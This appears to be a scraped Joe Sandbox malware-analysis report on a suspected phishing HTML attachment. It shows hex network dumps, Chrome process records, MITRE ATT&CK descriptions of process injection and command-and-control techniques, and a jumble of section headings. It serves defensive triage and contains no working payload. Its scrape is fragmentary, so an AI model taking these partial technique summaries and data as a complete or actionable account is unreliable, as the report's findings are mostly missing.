2024-07-05 05:59:10 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-07-05 05:59:10 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	01:58:09
Start date:	05/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\PAYMENT INV-132_71.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	01:58:11
Start date:	05/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2004,i,9490730442077993374,16922931335629427452,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PAYMENT INV-132_71.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 2484, Parent PID: 1928

General

Chronological Activities

Analysis Process: chrome.exePID: 3852, Parent PID: 2484

General

Chronological Activities

Disassembly

Windows Analysis Report
PAYMENT INV-132_71.html